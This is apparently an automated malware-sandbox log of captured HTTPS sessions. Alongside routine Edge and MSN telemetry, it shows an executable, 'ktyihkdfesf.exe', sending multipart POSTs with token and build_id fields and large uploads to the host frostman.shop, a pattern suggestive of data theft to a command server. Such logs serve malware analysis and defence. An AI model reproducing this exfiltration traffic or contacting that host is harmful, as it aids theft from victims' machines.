                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:46 UTC1002INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                                ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
                                                                                                                                                                                                                                                                                                Server: AkamaiNetStorage
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:46 GMT
                                                                                                                                                                                                                                                                                                Content-Length: 354
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                Akamai-Request-BC: [a=23.210.4.149,b=893334880,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                                Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                                Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                Akamai-Server-IP: 23.210.4.149
                                                                                                                                                                                                                                                                                                Akamai-Request-ID: 353f3560
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Akamai-GRN: 0.9504d217.1734676306.353f3560
                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:46 UTC354INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 f7 49 44 41 54 78 01 ed 57 d1 0d 83 20 10 7d e9 04 8c d0 51 d8 a4 8e e0 06 32 42 37 b2 23 74 03 47 a0 1b b4 10 21 62 cb 79 ca d1 f8 c3 4b 5e 34 70 be 7b 22 07 08 34 fc 42 3b 8e 8e d6 f1 5d 91 5e f3 c6 25 1f 2a 27 cd 71 a0 92 77 49 90 71 54 44 5c 8c 39 02 af d5 27 cf ea 5c d0 18 3a 7b 46 ac c4 40 84 c1 f2 39 48 61 85 ff 19 50 e1 59 2b 11 8e 93 f3 8a 32 90 79 f6 1a 30 a8 33 19 8b 0d 78 dc 21 2f 53 91 01 09 56 79 2e 38 19 cd 40 33 b0 c7 c0 0d 73 c9 4d 58 ef 66 47 db 59 50 65 38 25 7d 56 d0 9e cd b3 67 04
                                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR szzpHYs%%IR$sRGBgAMAaIDATxW }Q2B7#tG!byK^4p{"4B;]^%*'qwIqTD\9'\:{F@9HaPY+2y03x!/SVy.8@3sMXfGYPe8%}Vg


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                47192.168.2.649938116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:47 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----2D2DBAS0ZU3E37GD268Q
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 131557
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:47 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 32 44 42 41 53 30 5a 55 33 45 33 37 47 44 32 36 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 32 44 32 44 42 41 53 30 5a 55 33 45 33 37 47 44 32 36 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 32 44 32 44 42 41 53 30 5a 55 33 45 33 37 47 44 32 36 38 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------2D2DBAS0ZU3E37GD268QContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------2D2DBAS0ZU3E37GD268QContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------2D2DBAS0ZU3E37GD268QCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:47 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:48 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                48192.168.2.64990920.110.205.1194432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC1175OUTGET /c.gif?rnd=1734676307694&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=87dea9e2d67e4be995ff056bd35dd4db&activityId=87dea9e2d67e4be995ff056bd35dd4db&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                Location: https://c.bing.com/c.gif?rnd=1734676307694&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=87dea9e2d67e4be995ff056bd35dd4db&activityId=87dea9e2d67e4be995ff056bd35dd4db&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=D7BFD8CBD1834510B8B7DB118C7D5586&RedC=c.msn.com&MXFR=015EFEE8056263FB2030EBB304006296
                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                Set-Cookie: MUID=015EFEE8056263FB2030EBB304006296; domain=.msn.com; expires=Wed, 14-Jan-2026 06:31:48 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:48 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                49192.168.2.649915108.139.47.924432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC925OUTGET /b?rn=1734676307694&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=015EFEE8056263FB2030EBB304006296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:48 GMT
                                                                                                                                                                                                                                                                                                Location: /b2?rn=1734676307694&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=015EFEE8056263FB2030EBB304006296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                set-cookie: UID=1921a3731edec7d894bcea01734676308; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                set-cookie: XID=1921a3731edec7d894bcea01734676308; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                Via: 1.1 ed4584f7c263c11cf4adf75ba3a25764.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: WUunni8w9JXHn2g7uEfKmNfOCePrLRAuI8VMZOXhu0Xj1n2SEud1Og==


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                50192.168.2.649944116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC329OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----F3OHLFUK6F3E3ECTRI5F
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 6990993
